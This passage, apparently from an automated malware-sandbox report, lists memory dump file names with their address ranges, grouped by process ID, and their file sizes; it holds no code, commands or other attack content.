                                                                                                                                                                          • memory/4308-164-0x000000001B6B0000-0x000000001B6BE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4404-325-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-373-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-329-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-331-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-385-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-360-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-328-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-382-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-367-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-320-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-364-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-378-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-370-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4404-376-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4504-312-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4504-310-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4504-317-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4504-313-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4504-311-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4504-314-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            56KB

                                                                                                                                                                          • memory/4740-4-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            3.8MB

                                                                                                                                                                          • memory/4740-3-0x0000000000400000-0x0000000000DEF000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4740-0-0x0000000000400000-0x0000000000DEF000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/4740-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                                                                                                                                            Filesize

                                                                                                                                                                            3.8MB